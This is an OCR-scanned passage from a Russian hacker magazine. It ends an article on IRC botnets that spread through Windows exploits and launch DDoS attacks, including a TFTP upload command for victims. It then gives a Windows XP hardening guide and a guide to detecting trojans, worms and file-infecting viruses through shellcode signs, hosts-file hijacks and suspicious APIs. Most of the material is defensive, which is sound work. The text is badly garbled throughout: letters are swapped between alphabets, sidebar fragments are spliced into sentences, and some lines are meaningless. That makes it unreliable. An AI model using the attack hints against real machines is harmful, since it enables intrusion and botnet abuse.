также другие виндовые бреши). Пос- 
ле того как баг успешно проэксплуа- 
тирован, бот сам себя заливает на ма- 
шину и распаковывает. Новорожден- 
ный «младенец» забирается на тот же 
IRC-cepBep, где обитает его папа :), и 
присоединяется к злодеяниям. Учиты- 
вая масштаб эпидемии на КРС-фрон- 
те, число таких ботов может достигать 
десятков тысяч. А теперь представь, 
что все они нападут на сервер со 
средним каналом. Машина просто не 
справится с большим напором и сра- 
зу же уйдет в даун. 

Все проекты ботов приватны и 
трейдятся хакерами на специальных 
каналах. Но иногда добропорядоч- 
ные админы выкладывают ботов в 
публичные источники (для изуче- 
ния), которые можно отыскать в Гуг- 
ле (смотри, например, 
swatit.org/bots/gtbot.html). 

Вот, собственно, и все. Теперь ты 
знаком с азами хакерского мастерства 
в Windows-koHconn. Как видишь, мож- 
но без особых проблем добиться пол- 
ного управления системой несмотря 
на убогость Windows в плане удален- 
ного администрирования. Но помни, 
что этот материал опубликован лишь 


В комплек- 
те архива с 
портирован- 
ным Джо- 
ником есть 
два преком- 
пиленных 
бинарника 
для процес- 
соров АМО 
и INTEL. 
Оцени кон- 
фигурацию 
системы, а 
затем выбе- 
ри подходя- 
щий вари- 
ант. 


Чтобы за- 
лить файл 
по ТЕТР- 
протоколу, 
достаточно 
выполнить 
команду 
TFTP host 
GET file. 


Автор и ре- 
дакция не 
несут ника- 
кой ответ- 
ственности 
за примене- 
ние инфор- 
мации из 
статьи в 
незаконных 
целях. 
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Грамотная защита оси 
Настройка Windows ХР стандартными 
средствами 


Найди врага в своем 
доме! 
Обнаружение злого сосрта без 
использования антивируса 


Инструментарий 
хакера 
Сравнительный анализ эмуляторов 


Найти и уничтожить! 
Руководство по борьбе с вирусами и 
троянами 
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НАСТРОЙКА WINDOWS XP 
СТАНДАРТНЫМИ СРЕДСТВАМИ 


юбую операционку необходимо грамотно защищать от внешних напастей. 
Если об этом своевременно не позаботиться, то твоя система будет живой 
мишенью для вирусов, троянов, червей и далее по списку. 


азумеется, защищать систему 


имеет смысл сразу после ус- 


тановки. Только тогда ты мо- 


жешь быть уверен в том, что, 


| кроме тебя, на машине никто 
не обитает :). Но если ты изначально забил 
на защиту, ничто не мешает исправиться и 
наверстать упущенное. Тебе не придется 
прибегать к помощи посторонних программ 
- вся настройка производится с помощью 
стандартных средств. 


ПОЧУВСТВУЙ СЕБЯ 
АДМИНИСТРАТОРОМ 

m Первое, что необходимо сделать, - это 
зайти в раздел «Администрирование» в па- 
нели управления. Именно с него начинается 
организация безопасности твоей системы. 
Кликай на ярлычок «Службы» и вниматель- 
но ознакомляйся со списком дефолтовых 
сервисов. Многие из них должны быть отк- 
лючены за ненадобностью. К примеру, реко- 
мендуется вырубить службу рассылки сис- 
темных оповещений. Дело в том, что в пос- 
леднее время этот сервис юзается злобны- 
ми спамерами, которые рассылают свои со- 
общения с помощью автоматизированных 
червей. Причем фаервол не всегда защища- 
ет от назойливых рекламщиков - хакеры на- 
учились спуфить IP-agpec и тем самым про- 
биваться через брандмауэр. 

Далее убедись, что у тебя выключен 
сервис удаленного управления Windows 
и Telnet. Для рабочей станции эти демо- 
ны абсолютно бесполезны. Только 
представь, что твоей машиной управляет 
злобный хакер, который случайно (или 
намеренно) подобрал пароль к админист- 


раторскому аккаунту. 


И, наконец, отключи удаленное управление 
реестром. Если взломщик по каким-то причи- 
нам узнает пароль администратора (или лю- 
бого юзера с повышенными правами), то 
сможет удаленно подключиться к реестру. 
Хакеру будут доступны три первых ветки. 
Злоумышленник может так напортачить, что 
тебе придется сносить всю систему. 

Самое время позаботиться о будущей бе- 
зопасности. Выдели самые важные службы, 
которые не должны быть внезапно останов- 
лены. Зайди в пункт «Восстановление» и вы- 
бери «Перезапуск службы» после первого, 
второго и третьего сбоев. Если хакер попы- 
тается атаковать кривой сервис, он без 
проблем перезапустится. 


БЕЗОПАСНЫЙ ФАЙЛОВЫЙ АРХИВ 

ш Некоторые «умные» личности рекомен- 
дуют отключить сервис защиты файлов. 
Этого не стоит делать по одной простой при- 
чине - многие троянцы любят маскироваться 
под якобы системный файл, после чего 
WinXP медленно, но верно превращается в 
плацдарм для червяков. При включенном 
сервисе служба перезапишет важный файл 
его копией и тем самым ликвидирует чер- 
вячка. Если закралось подозрение, что ви- 
рус каким-то образом проник на машину, за- 
пусти программу SFC с параметром /SCAN- 
NOW, которая моментально просканирует 
все системные каталоги. 

Заветная мудрость линуксоидов: не сиди 
под рутом! То же самое рекомендуем и тебе. 
Когда у тебя невзрачные права (которых 
вполне хватает для нормальной работы), 
трояну не под силу отформатировать винт, 
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переслать системные пароли и т.п. 
Но порой переезд на обычный акка- 
унт невозможен (если юзер работает 
с приложениями, требующими go- 
полнительных привилегий). В этом 
случае приходится прибегать к go- 
полнительным мерам безопасности. 
Убедись, что WinXP стоит Ha файло- 
вом разделе NTFS. Только в этом 
случае ты можешь контролировать 


ПРОПАТЧЬ СВОЮ ВИНДУ! 


ПР; Уесиыно 5 


‚ Чего-то не хватает 


права на каталоги. Если это так, за- 
пусти проводник, войди в «Сервис -> 
Свойства папки -> Вид» и убери га- 
лочку «Использование простого об- 
щего доступа к файлам». 
Согласись, тебе не всегда требует- 
ся полный доступ к системным срай- 
лам. А твоим правом на запись в 
виндовый каталог часто пользуются 
троянцы, которые хитрым образом 


|i 


проникли на машину. Чтобы никакая 
зараза не могла записать себя в 
c:\windows, тебе нужно перезагру- 
зить машину и зайти в безопасном 
режиме под аккаунтом администрато- 
ра. Запускай проводник и топай в 
свойства c:\windows. Кликай по безо- 
пасности и удаляй свой идентифика- 
тор из списка владельцев. То же са- 
мое рекомендуется сделать и с ката- 
логом c:\Program Files. Теперь, когда 
ты перезагрузишь машину, у тебя 
будут права только на просмотр и 
выполнение системных файлов. 


Скачай 
справочник 
по реестру 
Windows 
(winchang- 
er.whatis.ru 
/file/reg4.zi 


и всегда 
Ты можешь озадачиться вопросом: а al 5 Bone 
как теперь ставить новый сосфт? Ведь се его пот- 
рясающих 
сетапу требуется записать данные в ОМ жНо С 
Program Files, а иногда и закинуть кон- тей. 
фиги в виндовый каталог. Придется 
запускать инсталлятор от имени адми- 
нистратора. Для этого кликни правой 
кнопкой по исполняемому сфайлу и 
выбери пункт «Запустить от имени». Убедись, 
Достаточно ввести пароль gna учет- что у тебя 
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проверенные инсталлеры, ведь троя- новлен 
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Регулярно 
посещай 
www.xakep.ru 
и Www.secu- 
ritylab.ru - 
Bcerga 6y- 
дешь в Kyp- 
се новых 
уязвимос- 
тей и пат- 
чей. 


Почаще 
проверяй 
список ав- 
тозагрузки 
командой 
msconfig. 
Mano nu 
какая зара- 
за там оби- 
тает :). 


ДОВЕРЬСЯ ФАЕРВОЛУ 

Страшно подумать о том, что бу- 
дет, если вывести WinXP в интернет 
без запущенного фаервола. На ма- 
шину тут же нападут черви, базирую- 
щиеся на уязвимостях DCOM/ASN.1. 
Мы подсчитали, сколько нечисти за- 
пишется в среднем на незащищен- 
ную машину - за один день 450 тро- 
янцев и несколько десятков ЕТР- 
скриптов! Впечатляет, не правда ли? 
А теперь представь, что эти черви 
живут и здравствуют на твоей pog- 
ной тачке. При таком раскладе легче 
переустановить систему, чем жить 
среди опасных вирусов. 

Несмотря на скудные возможности 
стандартного сдаервола ему вполне 
можно доверять (особенно в $Р2, ко- 
торый обязательно следует устано- 
вить! - прим. peg.). Не слушай тех, кто 
рекомендует поставить наворочен- 


ный брандмауэр на рабочую станцию. 


Если ты используешь встроенный 
сервис, то выигрываешь в скорости и 
времени. Ведь настроить ICS, как два 
байта переслать! Чтобы обезопасить 
себя от всяких червячков, зайди в 
свойства соединения, выбери вклад- 
ку «Дополнительно» и отметь соот- 
ветствующую опцию. Далее жми на 
«Параметры» и отмечай все службы, 
которые необходимо разрешить. Це- 
лесообразно добавить в разрешен- 
ные Web-, ЕТР- и $МТР-службы (если 
таковые имеются). Все остальное ав- 
томатически скроется за огненной 
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МНЕНИЕ ЭКСПЕРТ, 


i 


offtopic, профессионал в области IT 
безопасности, постоянный автор и 
модератор форумов проекта 
Securitylab.ru, MCSE и МСТ 


стеной. Для мониторинга обязатель- 
но журналируй все пропущенные па- 
кеты в отдельный лог. По желанию 
можешь разрешить или запретить 
ICMP - все в твоих руках. 

Единственным недостатком ICS в 
"до5Р2ческой" ХР является неспособ- 
ность разграничения прав по |P-agpe- 
сам. Но в некоторых случаях это не 
нужно. 


КОНТРОЛИРУЙ РЕЕСТР 
Теперь, когда у тебя имеются ус- 

тановленный фаервол и защищен- 
ный файловый архив, пришло время 
покопаться в реестре. Различным па- 
раметрам и разделам следует уделять 
особое внимание, ибо повреждение 
реестра может привести к потере всех 
важных данных. 

Запускай стандартный редактор ре- 
естра regedit.exe от имени админист- 


ратора. Его возможностей хватит для 
грамотной настройки. В первую оче- 
редь, зайди во вкладку «HKLM\soft- 
ware\Microsoft\Windows\Current 
Version\Run» и убедись, что там жи- 
вут лишь доверенные приложения. 
Конечно, если ты только что поставил 
систему (или постоянно мониторишь 
список автозагрузки), волноваться не 
о чем. Зайди в меню «Правка -> Разре- 
шения» и сними права со своего norn- 
на. Теперь, даже при большом жела- 
нии, запущенные от тебя троянцы не 
пропишутся в автозагрузке. То же са- 
мое проделывай с разделами Кип 
Once и Run Services в HKLM и HKCU. 


CMD ПОД УДАРОМ 

Различная хакерская нечисть пы- 
тается запустить cmd.exe gna уда- 
ленного управления системой. У те- 
бя никогда не было желания воспре- 


Правильные разрешения Ha опасные ветки 


Часто бывает, что троянец записывает в 
файл hosts ссылку вида «microsoft.com 
hacker-ip-address». 


пятствовать этому? Самое время пе- 
реименовать Cmd.exe на произволь- 
ное имя. Назови его, скажем, 
cmx.exe. Не забывай, что копия инте- 
рпретатора находится в 
c:\windows\dllcache\cmd.exe, и ee 
также нужно переименовать. Но это 
еще не все. Теперь закрепи все из- 
менения в реестре и не дай хакеру 
ни малейшего шанса :). Сделай так, 
чтобы, если хакер пытается обра- 
титься к ста.ехе, вместо шелла за- 
пускался обычный блокнот, появле- 
ние которого будет сигналом об 
опасности. Перейди во вкладку 


«HKLM\Software\Microsoft\Windows\ 
Current Version\App Patch», создай 
там вложенный раздел cmd.exe и из- 
мени значение дефолтового пара- 
метра на путь к блокноту. Теперь 
попробуй запустить cmd.exe ;). 

Не секрет, что хакеры любят скани- 
ровать сети на предмет расшаренных 
ресурсов. Если у тебя есть общие пап- 
ки пользователей, стоит задуматься 
над резонным вопросом, нужно ли 
светить список шар наружу. Можно 
отключить NULL-ceccuto, то есть отоб- 
ражение общих папок для анонимных 
пользователей. Зайди во вкладку 


+, 


Г a 
Трюк с заменой интерпретатора 


«HKLM\SYSTEM\CurrentControlSet\Co 
ntrol\Lsa» и выстави значение 1 у 
строкового параметра 
RestrictAnonymous. Теперь, чтобы 
посмотреть список расшаренных ката- 
логов, нужно залогиниться под сис- 
темным юзером. 

Часто бывает, что троянец записы- 
вает в файл hosts ссылку вида 
«microsoft.com hacker-ip-address». 
После обращения к сайту MS Ha 
компьютер жертвы заливается еще 
один троян (как правило, через дыру 
в браузере). Чтобы этого не произош- 
ло, измени местоположение срайла 
hosts (и Imhosts). Это можно сделать в 
разделе «HKLM\SYSTEM\ 
CurrentControlSet\Services\Tcpip\ 
Parameters2 - смени значение 
DataBasePath на другой путь. 


ЛОКАЛЬНАЯ БЕЗОПАСНОСТЬ 
ПРЕВЫШЕ ВСЕГО 

m Согласись, что если на твоей Ma- 
шине обитают еще и другие пользо- 
ватели, грех не ограничить их в BO3- 
можностях. Для этого необходимо 
замутить локальную политику безо- 
пасности. Заходи в «Администриро- 
вание» и выбирай соответствующий 
раздел. Здесь ты можешь задать ог- 
раничение на доступ к расшарен- 
ным ресурсам, запретить юзерам 
вырубать ХР, отключить возмож- 
ность обращения к реестру и мно- 
гое другое. Хочешь большего? Сов- 
сем необязательно выкачивать ка- 
кой-нибудь функциональный тви- 
кер, достаточно запустить скрипт 
групповой политики gpedit.msc. Он 
поможет осуществить запрет к 
вкладкам стартового меню, панели 
управления и многим другим вещам. 
Здесь же ты можешь запретить за- 
пуск файлов с произвольными наз- 
ваниями и расширениями, а также 
вообще закрыть локальный вход. 
Все в твоих руках :). 


БЕЗ ШАНСОВ 

и Можешь быть уверен, что никакой 
троянец не зальется в твою систему. 
А если он и проникнет, то не будет 
иметь шансов на выживание. И это 
благодаря тому, что ты вовремя поза- 
ботился о безопасности. 


Правильная политика - жесткая политика 


Стандарт- 
ное место- 
положение 
файла 
hosts - 
c:\win- 
dows\sys- 
tem32\driv 
ers\etc\. 


He выклю- 
чай возмож- 
ность вос- 
становления 
системы. 
Этот сервис 
требует 
несколько 
метров на 
HDD, но яв- 
ляется 
весьма неп- 
лохой стра- 
ховкой. 
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И ВРАГА В СВОЕМ ДОМЕ!) 


Deeoni$ (arustamovv2000@mail.ru, ICQ 982622) 


НАЙДИ ВРАГА 
В СВОЕМ ДОМЕ: J 


ОБНАРУЖЕНИЕ ЗЛОГО СОФТА 
БЕЗ ИСПОЛЬЗОВАНИЯ АНТИВИРУСА 
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ростые пользователи 


боятся вирусов как ог- 


ня. Обвешав себя ан- 


тивирусными програм- 

мами, они надеются, 
что беда обойдет их стороной. Но за- 
частую больше помогают мозги, чем 
специализированное ПО. (Никогда в 
жизни не пользовался антивирусами, 
кроме веб-сервисов проверки от- 
дельных файлов: грамотно настроен- 
ный фаервол и прямые руки стоят 
больше, чем пожизненный ключ от 
AVP ;) - прим. AvaLANche'a.) В этой 
статье мы расскажем о том, как са- 
мостоятельно обнаружить сракт ин- 
фицирования машины и постараться 
уничтожить опасность. 


КОНЬ В ПАЛЬТО 

ш По принципу действия трояны 
разделяют на две основные группы: 
онлайн и офорлайн. Способы появле- 
ния и закрепления их в системе схо- 
жи, разница только в функциях (00- 
нако в любом случае коник должен 
иметь доступ к сети - для живущих 
в чуме с чукчами эта опасность не 
страшна). 

Симптомы того, что ты стал конево- 
дом, просты и предсказуемы. Прежде 
всего, это угон мыла, аськи или паро- 
ля на ЕТР. Если автор трояна - прико- 
лист, то компьютер может себя стран- 


вом случае надо просмотреть попав- 
ший к нам в руки файл в НЕХ-редак- 
торе (после декомпрессии срайла, так 
как обычно .ехе’шники сжимают - 
прим. ред.) и проверить его на пред- 
мет наличия е-тай-адресов, доменных 
имен, настораживающих имен и рас- 
ширений файлов типа .pwl. Также 
можно взглянуть на директорию им- 
порта (структуру, которая содержит 
необходимую gna работы программы 
информацию о системных сдункциях 
Windows). Если пришедший к тебе в 
письме ‹ехе’шник не предназначен 
для работы с сетью (например, сказа- 
но, что это навороченная демка), но 
почему-то активно использует сете- 
вые API, то это, скорее всего, и есть 
наш клиент. Здесь прекрасно подой- 
дет W32Dasm 
(www.expage.com/page/w32dasm). Он пока- 
зывает все функции, которые исполь- 
зует прога. В крайнем случае, можно 
воспользоваться любым текстовым 
редактором и просмотреть подозрева- 
емого на наличие подозрительных 
имен API. Это не дает 100%-ной гаран- 
тии, но в какой-то степени повышает 
надежность анализа. Подозритель- 
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ные на этот счет функции можно ви- 
деть на врезке. 

При уже активном троянчике спосо- 
бы детектирования достаточно ба- 
нальны. Первое, что делает любой 
пользователь, это смотрит ключи ре- 
естра, отвечающие за автозапуск, и 
список процессов на предмет инород- 
ных тел. В большинстве случаев это 
дает положительный результат. Же- 
лательно также просканировать пор- 
ты и послушать активные соединения. 
Для дифференцировки злой проги и 
стандартных видовых сайлов помо- 
жет дата создания. Коник будет отли- 
чаться по данному критерию от сис- 
темного файла (хотя He сфакт). Из go- 
полнительного сосфта могу посовето- 
вать Trojan Remover (www.simplysup.com), 
он специализируется Ha отлове по- 
добных тварей. Для реестра имеется 
NBG Clean Registry 
(dialupprof.newmail.ru/nbgcleanr.htm) - B Hero 
встроен монитор обращений к объек- 
ту его работы. Для проверки портов 
можно юзать Languard, Advanced 
Administrative Tools, SuperScan и 
XSpider. Они проверят порты, обычно 
занимаемые троянами, и сообщают о 
наличии левой активности. В частнос- 
ти, тулза с ламерской приставкой «су- 
пер», как ни странно, очень хороша, 
поскольку имеет краткое описание 
многих портов, и ты, даже при боль- 


но вести: мышка бегает по рабочему Е а шом желании, не перепутаешь какой- 
столу как сумасшедшая, самопроиз- z= == ЕЕ нибудь сервис C троянцем. 
BONbHO открывается/закрывается CD- ES фены Защититься OT подобной напасти go- 
ROM, появляются левые окошки и — a = = ry вольно просто - не запускать NOgO3- 
много чего еще Троян всегда откры- = = ительный срайл и поставить персо- 

. Тр да откр Ра оеиееар, ИНН р ный ф р 
вает порты для связи с боссом, следо- —— фола пал шие нальныи фаервол. 


вательно, появляется левый траффик. 
Если лампочки мигают, траффик на 
счетчиках растет, а ни одна програм- 
ма для работы в инете не запущена, 
есть повод всерьез призадуматься. 
Конечно, это дело может быть просто 
в какой-нибудь службе, но лишний 
раз проверить не повредит, особенно 


А 


UAVS 


Существует еще одна группа этих 
«чудо-программ» - те, которые не дос- 
тупны широкой общественности или 
сочетают в себе свойства червей и 
вирусов, то есть распространяются по 
сети и/или внедряют свой код в дру- 
гие исполняемые срайлы с целью об- 
хода фаерволов и сокрытия своего 


= = 
если размеры отправленных данных = присутствия в системе. С первыми бо- 
не поддаются критике. a роться сложно, особенно если они 
Лошадь на твоем компьютере мож- = направлены на выполнение конкрет- 
tees asdl 


но попробовать обнаружить на двух 
стадиях: когда программа еще под по- 
дозрением и во время работы. В пер- 
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W32dasm показывает импортируемые 
АР!/-функции 


ной задачи в конкретной системе. И 
совсем не обязательно, что троянец 
будет стартовать при каждом запуске 


системы или активно пользоваться 
сетью. Вообще, по определению, тро- 
янская программа - это программа, 
выполняющая какие-либо заранее 
предусмотренные действия вопреки 
воле пользователя, приводящие к 
полной или частичной потере инфор- 
мации и другим отрицательным после- 
дствиям. Здесь чем лучше ты разби- 
раешься в системе, тем оригинальней 
и действеннее можно придумать спо- 
собы защиты и обнаружения. Но за- 
мечу, что, не зная цели, алгоритмов 
или внешних симптомов, определить 
подобные проги тяжело. Что же каса- 
ется коней, комбинирующих в себе 
разные свойства вирусов и червей, то 
их можно найти и обезвредить, соче- 
тая меры по противодействию послед- 
ним. Надо отметить, что вирусопо- 
добные лошадки реально могут пот- 
репать нервы хозяину, встраиваясь 
в приложения, которые просто обя- 
заны иметь доступ в интернет. Это 
могут быть и браузеры, и почтовые 
клиенты, и даже системные службы. 
Учитывая, что в последнее время 
этот вид паразитов становится все 
более популярным, надо уметь защи- 
тится и от них. Проще всего это сде- 
лать, работая с минимальными при- 
вилегиями в системе. Под привилеги- 
ями я подразумеваю запрещения за- 
писи в системные каталоги и файлы 
приложений. Эта мера создаст доста- 
точно высокий уровень защиты от 
всякой аряни. 


СЕТЕВЫЕ ЧЕРВИ 

и Любой нормальный пользователь 
хотя бы раз в жизни цеплял червяка 
(будь проклят тот день, когда на моем 
домашнем компьюторе, подключен- 
ном к районной сети, отвалился 
ZoneAlarm! - прим. AvaLANche'a). Су- 
ществует два основных вида этой за- 
разы: те, которые распространяются 
без участия юзера, и те, которые в той 
или иной степени используют челове- 
ческий сфактор, то есть любопытство, 
жадность, неосторожность и многое 
другое. Эти виды не сильно отличают- 
ся друг от друга, но мы разделили их, 
так как методы их обнаружения нем- 
ного различны. 

В общем случае червь сначала за- 
сылает в систему свою голову (заг- 
рузчик). Она может внедряться и че- 
рез дыры в ПО, и через ресурсы со 
слабыми паролями, и, например, в 
электронном послании в виде VBS- 
скрипта или вложенного файла. Заг- 
рузчик выполняет минимальные 
действия в системе, его задачей явля- 
ется подтягивание основного тела ви- 
руса с последующей передачей ему 
главной роли. Он создает ТСР-соеди- 
нения, выполняет действия по адапта- 
ции паразита (определяет ОС, права 
пользователя, адреса системных вы- 
30BOB ит.д.), а затем чаще всего поги- 
бает. Голова, использующая дыры, 
часто представляет собой shell-Kog и 
служит лишь для ограниченного чис- 
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Признаки, по которым можно определить наличие червя в системе 


ла задач, необходимых остальной 
части зверька. После попадания хвос- 
та вируса на компьютер он должен 
спрятаться в каком-нибудь процессе 
или файле, а если имеет место поли- 
мороризм, то и расшифроваться. 

Червь может и не закрепляться в 
системе, а вести кочевой образ жиз- 
ни. Это значительно уменьшает наг- 
рузку на сеть и обеспечивает боль- 
шую незаметность. Самым распрост- 
раненным (но не самым лучшим) ре- 
шением является создание отдельно- 
го файла с последующим его автоза- 
пуском. Более изощренные вирусы 
внедряют подложную библиотеку в 
директорию более или менее часто 
используемого приложения. Извра- 
щенцы могут регистрировать в систе- 
ме свои ловушки (hooks), модифици- 
ровать таблицу импорта процесса-но- 
сителя, вставлять в кодовый сегмент 
команды перехода на свое тело, ска- 
нировать память в поисках таблиц 
виртуальных функций и модифици- 
ровать их по своему усмотрению. 
Еще раз отмечу, что только самые 
примитивные черви создают новый 
процесс (вспомним MSBlast), посколь- 
ку есть возможность внедриться в 
чужое адресное пространство, ис- 
пользуя межпроцессные средства 
взаимодействия. 

Далее следует фаза размножения. 
На этой стадии червь должен зашиор- 
ровать критичные участки кода или 


сгенерировать абсолютно новый код 
(полиморфизм), без чего он рискует 
потерять добрую половину своих ко- 
пий. Существует несколько вариантов 
распространения: импорт данных из 
адресных книг, просмотр локальных 
файлов на наличие сетевых адресов, 
генерация IP-agpecosB и сканирование 
|Р-диапазона. Найдя подходящую 
жертву, вирус проверяет наличие 
своей копии на машине. Делается это 
чаще всего «рукопожатием»: машине 
посылается определенное слово, на 
что следует особый ответ. 

Как же определить наличие червя 
на тачке? Если код написан грамотно 
и относится к ресурсам бережно, то 
сделать это довольно сложно. Точ- 
ный ответ о присутствии червя может 
дать лишь дизассемблирование (при- 
том, что вирус может вообще не тро- 
гать файловую систему, а выполнять- 
ся в памяти) или эвристик. Анализи- 
ровать всю оперативку немногим под 
силу. Однако существует ряд призна- 
ков, по которым можно определить 
присутствие инородного тела в систе- 
ме. (см. таблицу выше). Первая осо- 
бенность говорит сама за себя. Паке- 
ты расходятся по всей сети и зачас- 
тую адресуются несуществующим по- 
лучателям. Рассылка идет постоянно 
либо через короткие интервалы вре- 
мени. Соединение устанавливается 
без доменного имени. Хотя в случае 


сканирования локальных файлов это » 


Более изощренные вирусы внедряют NOG- 
ложную библиотеку в директорию более или 
менее часто используемого приложения. 
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CommView в действии 
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АТАКА HA WINDOWS 


Интересная 
прога для 
борьбы с 
ВНО и 
автозапуска- 
ющимся 
софтом - 
BHOCaptor 
(www.xcap~ 
tor.org). 


HLLP-supy- 
сы могут 
заражать 
методом 
сдвига и ме- 
тодом пере- 
носа и ис- 
пользовать 
шифрова- 
ние. 
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BAUMANN НАЙДИ ВРАГА В СВОЕМ DOME! ) 


ПОДОЗРИ ЬНЫЕ АР!-ФУНКЦИИ 


Анализ можно производить любым 
удобным снисером, который имеет хотя 
бы примитивные средства сортировки 
и просмотра пакетов. 


не так. Но факт скана легко обнару- 
жить, подкинув вирусу приманку. 
Ненормальная сетевая активность 
часто свидетельствует о паразите. 
Большинство современных червей 
распространяются с огромной ско- 


Не сиди под ростью, из-за чего исходящии трафик 


Админист- сильно возрастает. Также могут отк- 

м и рыться новые порты, о которых ты ни- 
чего не знал и которые непонятно кто 
слушает. Этого, правда, может и не 
быть, если червь внедрится в низкоу- 
ровневый сетевой сервис. 

ЕЕ Подозрительные сетевые пакеты 

программа могут содержать в себе разнообраз- 

для выявле" || е последовательности символов, 

ния подоз- 

рительных которые в обычных условиях там не 

процессов - должны иметь место. Например, если 

Taskinfo. 


цель - web-cepBep, то признаками 
shell-koga могут служить последова- 
тельности из трех или более МОР, ма- 
шинные команды CALL ESP, JMP ESP 
и другие, имена командных интерпре- 
таторов и библиотек типа адтйп.а!, 
бессмысленные последовательности 
символов, используемые gna пере- 
полнения буфера. Трафик можно лег- 
ко анализировать и выявлять подоз- 


Й Примерно так мо- 
жет выглядеть 


ини” ппаратный ска- 
ур ! аппара ска 


== Hep, специализи- 
рующийся на 


неее" №5 червях 
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рительные пакеты. Однако стоит авто- 
ру вируса слегка закриптовать shell- 
код, и подобная сфильтрация не сра- 
ботает, хотя размер переполняемого 
буфера настолько мал, что в дыру 
очень трудно впихнуть еще и рас- 
шифровщик. Анализ можно произво- 
дить любым удобным снифером, кото- 
рый имеет хотя бы примитивные Cpeg- 
ства сортировки и просмотра пакетов. 
Я бы посоветовал EtherSnoop 

( ). 

Подозрительные письма можно вы- 
явить по наличию в них либо ехе- 
файла (а также всяких 
im_nude.jpg.exe), либо скрипта. Быва- 
ет, что голова червя приходит в пос- 
лании в виде \/В$-сценария и затем 
качает хвост из сети в виде програм- 


мы. Вирус может быть и \/5Н-кодом. 
Для защиты от вирусов на WSH goc- 
таточно не запускать их и отклю- 
чить данную опцию в почтовом кли- 
енте, если таковая имеется. The Bat! 
считается одним из самых безопас- 
ных почтовиков из-за того, что не 
поддерживает скрипты. В Спеце «the 
XP Files» 

# 03.04(40) мы довольно подробно 
писали о защите от \/5Н-злодейств, 
поэтому двинемся дальше. 

Часто в теле вируса могут быть не- 
зашифрованные строки, которые 
сразу режут взгляд при беглом 
просмотре в НЕХ-редакторе. Ищи в 
дампе адреса сайтов, обращение к 
которым ты не планировал, ветви 
реестра, ответственные за автоза- 
пуск, имена системных библиотек (в 
частности, напрямую относящиеся к 
работе с сетью) и интерпретаторов 
(могут использоваться интерпрета- 
торы web- и ЕТР-серверов, различ- 
ных скриптовых языков типа РНР, 
Perl и просто cmd.exe), «опасные» 
команды прикладных протоколов 
(НЕГО, СЕТ ит.д.) и ОС. Голова чер- 
вя обычно находится в секции дан- 
ных, поэтому ты сразу должен заме- 
тить там машинный код. 

Некоторые фирмы предлагают вы- 
сокопроизводительные аппаратные 
сканеры, построенные на програм- 
мируемых логических устройствах 
(PLD - ProgrammableLogicDevices), 
HO их цена настолько высока, что 
запросто может превзойти ущерб 
от атаки. Кардинальной мерой яв- 
ляется создание бэкапов всей сис- 
темы с установленными приложе- 
ниями и важных данных, чтобы в 
случае сбоя оперативно оживить 
машину. В МТ это легко делается с 
помощью планировщика задач и 
встроенного софта. Однако в лю- 
бом случае угроза от червей доста- 
точно велика, и они запросто могут 
уронить всю сеть. 


Часто в теле вируса могут быть незашисоро- 
ванные строки, которые сразу режут взгляд 
при беглом просмотре в НЕХ-редакторе. 


Файл, зараженный самым простым НЁЕЁР-вирусом 


ЕГО ВЕЛИЧЕСТВО ВИРУС 

и Вирус - это программа, которая размножается без ве- 
дома пользователя. Конечно, я дал своеобразную, неточ- 
ную формулировку, но нам этого достаточно. Существует 
множество методов инфицирования, однако всех их мож- 
но разделить на два основных класса: НЫ! -методы и низко- 
уровневые методы. 

HLL означает «языки высокого уровня» (у нас их называ- 
ют «ЯВУ»). Из ныне действующих видов этой заразы оста- 
лись HLLC и НЕЁР. Первые являются вирусами-компаньо- 
нами, о чем свидетельствует латинская буква «С», а вто- 
рые - паразитами (латинская «Р»). Были когда-то и HLLO- 
вирусы, или оверврайтеры, но из-за своего алгоритма 
размножения они стали музейными экспонатами. 

Пару слов о HLLC-Bupycax. Размножаются они очень 
просто: находят файл-жертву, переименовывают ее, копи- 
руют себя в тот же каталог под именем жертвы и при полу- 
чении управления делают все вышеперечисленное плюс 
запускают своего носителя. Например, если у нас был 
файл calc.exe, компаньон переименовывает его в 
vir_calc.exe, а сам становится Calc.exe. Теперь, когда юзер 
кликает по ярлычку калькулятора в главном меню, сначала 
грузится вирус, заражает новый файл и передает управле- 
ние реальной программе, чтобы не вызывать подозрений. 
Поставить диагноз очень просто - в папке будет в два раза 
больше ехе'шников. Но зверек может искусно маскировать- 
ся, делая жертвы скрытые и присваивая им другие расши- 
рения, чтобы отсрочить свое обнаружение. В любом случае, 
понять, что система атакована, не составит большого труда. 
Тогда следует удалить всех компаньонов и восстановить 
оригинальные имена. 

НЕЕР-вирусы действуют не так прямолинейно. Паразит на- 
ходит себе жертву, копирует первые ее М байт в конец (М 
равно размеру вируса), а затем пишет в начало свое тело. 
Получая управление, вирус лечит «зараженный» файл, то 
есть копирует оригинальное начало поверх своего носите- 
ля и урезает файл go положенной ему длины. Затем он его 
запускает, после завершения опять делая его «больным». 

Для усложнения анализа и лечения оригинальные части 
кода жертвы могут перетасовываться, как карты, и шифро- 
ваться. Однако криптование бессмысленно, так как ключ 
можно легко определить, зная, что первые две буквы нача- 
ла файла - MZ, а по адресу 3Ch находится аббревиатура 
РЕ-заголовка. Поэтому эти и другие сигнатуры изменяются 


Анализ РЕ-заголовка при помощи PE Tools 


ЖЕЭЗРНАМ НЕОН 
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ЧИТАЙ 
МУЗЫКУ! 


ВАШШИТАВИ НАЙДИ ВРАГА В СВОЕМ ДОМЕ! 


и только при временном лечении вос- BROUSER HELPER OBJECT 
станавливаются. 


Обнаружение также не составляет 
труда: размер файла в большинстве 
случаев заметно возрастает, иконка 
может исчезнуть или измениться. 
Для пущей верности рекомендуется 
проанализировать поля заголовка и 
сравнить их с реальными значениями. 
Для анализа заголовков я использую 
чудесную утилиту под названием РЕ 
Tools (www.uinc.ru). Она выводит в 
удобном для восприятия формате ин- 
формацию из РЕ-полей и может срав- 
нивать заголовки двух файлов, выво- 
дя их в виде таблицы. На скриншоте 
видно, что виртуальный размер всего 
загружаемого образа (Size of Image) 
равен 22400h байт. Это нормальное 
значение для программы объемом 
около сотни килобайт (обычно это 
значение всегда превышает физичес- 
кий размер файла), но если Size of 
Image становится меньше веса проги, 
то это, скорее всего, инфицирован- 
ный файл. Другой способ основыва- 
ется также на несовпадении значений 
в заголовке с реальными размерами. 
Просуммировав физическую длину 
(Raw Size) всех секций и добавив к 
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Некоторые этому количество байт, занимаемых 
вирусы не РЕ-заголовком, мы получим объем, ко- 
имеют тела, в 
поэтому и торый есть на самом деле. Кстати, не 
искать в забудь учесть смещения секций (Raw ПИН 
файлах не- 
Е Ве Offset) и возможное наличие оверлея 
случае не в конце - эту величину тоже надо 
